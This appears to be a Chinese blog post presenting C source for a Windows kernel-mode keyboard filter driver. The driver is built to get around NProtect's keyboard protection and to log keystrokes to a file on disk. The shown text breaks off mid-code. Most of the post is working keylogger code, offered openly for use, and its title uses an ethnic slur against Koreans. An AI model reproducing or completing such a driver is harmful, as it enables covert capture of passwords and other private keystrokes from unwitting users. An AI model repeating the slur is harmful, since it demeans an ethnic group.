看棒子不顺眼，破解NProtect，键盘驱动级截取键盘记录

最新推荐文章于 2023-11-13 11:32:00 发布

原创

最新推荐文章于 2023-11-13 11:32:00 发布 · 565 阅读

0 ·

CC 4.0 BY-SA版权

本文介绍如何使用驱动程序对抗NProtect的键盘钩子，通过驱动加载进入ring0级别，实现对NProtect键盘中断技术的拦截。代码示例展示了创建设备对象、钩子键盘输入、线程记录键盘动作以及处理设备控制请求的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

NProtect，是用驱动加载进入ring0级别，每个进程注入一个钩子，

用键盘中断技术写的一个钩子，

本人就用驱动对付他，

废话少说，看代码，

//#include <ntddk.h>
#include "kbhook.h"
#include "ScanCode.h"
#include <windef.h>
int numPendingIrps=0;
//
//ICTOL 以及控制设备的相关变量
//
#define IOCTL_PASSPROCESSID /
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
UNICODE_STRING devNameUnicd;
UNICODE_STRING devLinkUnicd;
PDEVICE_OBJECT pDevice; //控制设备的设备对象
NTSTATUS DeviceIoControlDispatch(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp); //DeviceIoControl的处理函数

VOID OnUnload( IN PDRIVER_OBJECT theDriverObject )
{
KTIMER kTimer;
LARGE_INTEGER timeout;
PDEVICE_EXTENSION pKeyboradDeviceExtension;
pKeyboradDeviceExtension=(PDEVICE_EXTENSION) theDriverObject->DeviceObject->DeviceExtension;
IoDetachDevice(pKeyboradDeviceExtension->pKeyboardDevice);
timeout.QuadPart=1000000;//1s
KeInitializeTimer(&kTimer);
while(numPendingIrps > 0)
{
  KeSetTimer(&kTimer,timeout,NULL);
  KeWaitForSingleObject(&kTimer,Executive,KernelMode,FALSE,NULL);

}
pKeyboradDeviceExtension->bThreadTerminate=TRUE;
KeReleaseSemaphore(&pKeyboradDeviceExtension->semQueue,0,1,TRUE);//让独立的记录线程获得执行机会
KeWaitForSingleObject(pKeyboradDeviceExtension->pThreadObject,
  Executive,KernelMode,FALSE,NULL);             //结束独立的记录线程
ZwClose(pKeyboradDeviceExtension->hLogFile);      //关闭文件句柄
IoDeleteDevice(theDriverObject->DeviceObject);    //删除设备对象

IoDeleteSymbolicLink(&devLinkUnicd);
IoDeleteDevice(pDevice);
DbgPrint("My Driver Unloaded!");
return;
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,IN PUNICODE_STRING RegistryPath)
{

NTSTATUS status={0};
int i;
PDEVICE_EXTENSION pKeyboardDeviceExtension;

IO_STATUS_BLOCK file_status;
OBJECT_ATTRIBUTES obj_attrib;
CCHAR ntNameFile[100]="//DosDevices//c://kbhook.txt";
STRING ntNameString;
UNICODE_STRING uFileName;

for( i=0 ; i < IRP_MJ_MAXIMUM_FUNCTION;i++)

theDriverObject->MajorFunction[i] = DispatchPassDown;
theDriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;

HookKeyboard(theDriverObject);
//建立一个线程用来记录键盘动作
InitThreadKeyLogger(theDriverObject);

/////////////////////////////////////////////////////////////////////////////////////////////
////////初始化一个旋转锁来访问链表///////////////////////////////////////////////////////////////
pKeyboardDeviceExtension=(PDEVICE_EXTENSION)theDriverObject->DeviceObject->DeviceExtension;
InitializeListHead(&pKeyboardDeviceExtension->QueueListHead);

KeInitializeSpinLock(&pKeyboardDeviceExtension->lockQueue);
KeInitializeSemaphore(&pKeyboardDeviceExtension->semQueue,0,MAXLONG);
////////////创建一个纪录文件///////////////////////////////////////////////////////////////////////
RtlInitAnsiString(&ntNameString,ntNameFile);
RtlAnsiStringToUnicodeString(&uFileName,&ntNameString,TRUE);
InitializeObjectAttributes(&obj_attrib,&uFileName,
OBJ_CASE_INSENSITIVE,